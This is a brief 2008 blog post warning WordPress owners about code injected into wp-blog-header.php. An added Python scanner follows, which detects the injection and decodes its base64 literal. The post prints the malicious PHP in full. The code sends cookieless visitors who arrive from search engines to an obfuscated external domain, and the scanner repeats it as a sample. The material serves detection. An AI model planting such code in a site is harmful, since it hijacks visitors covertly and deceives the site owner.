
TylerM – Tyler Menezes \ Blog \ Wordpress Vulnerability

WordPress Vulnerability

June 7, 2008 at 5:22 pm

There’s a big WordPress vulnerability going around (see http://clasione.blogspot.com/2008/06/wordpress-anyresultsnet-hack-search.html for details). Be sure to check your wp-blog-header.php for the following injected code:

<?php
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>
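One way to run that check locally, as an added example that is not part of the original post or the tool it mentions: a short Python scanner that flags the three traits of the block above (a referer test, a "no cookies" test, and a `Location:` header built from `base64_decode`) and decodes any base64 literal so the redirect target is visible. The function names, indicator labels and both sample strings are assumptions constructed for illustration.

```python
import base64
import re
import sys

# Constructed sample: the injected block quoted in this post, followed by a
# stand-in for the rest of wp-blog-header.php.
SAMPLE_INFECTED = r'''<?php
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>
<?php require('./wp-load.php'); ?>
'''
# Constructed stand-in for an unmodified file.
SAMPLE_CLEAN = "<?php require('./wp-load.php'); ?>\n"

B64_CALL = re.compile(r"""base64_decode\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")
INDICATORS = {
    # Code that branches on where the visitor came from.
    "referer_check": re.compile(r"""\$_SERVER\[\s*["']HTTP_REFERER["']\s*\]"""),
    # Code that only fires for visitors with no cookies (hides it from the logged-in owner).
    "no_cookie_check": re.compile(r"(?:sizeof|count)\(\s*\$_COOKIE\s*\)\s*==\s*0"),
    # A redirect whose destination is hidden behind base64_decode().
    "encoded_redirect": re.compile(r"""header\(\s*["']Location:[^;]*base64_decode\(""", re.I),
}

def decode_literals(php):
    """Return the decoded form of every string literal passed to base64_decode()."""
    decoded = []
    for match in B64_CALL.finditer(php):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
            decoded.append(raw.decode("utf-8", "replace"))
        except ValueError:  # malformed base64 (binascii.Error is a ValueError)
            decoded.append("<undecodable>")
    return decoded

def scan(php):
    """Report which indicators are present and whether the file needs review."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(php))
    suspicious = "encoded_redirect" in hits or len(hits) >= 2
    return {"indicators": hits, "decoded": decode_literals(php), "infected": suspicious}

if __name__ == "__main__":
    # Pass the path to wp-blog-header.php; with no argument the constructed sample is scanned.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            print(scan(fh.read()))
    else:
        print(scan(SAMPLE_INFECTED))
```

A hit means the file should be compared against a clean copy from the matching WordPress release; removing the block alone does not address how it was written there.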

Is your site infected?

Use this tool to check:
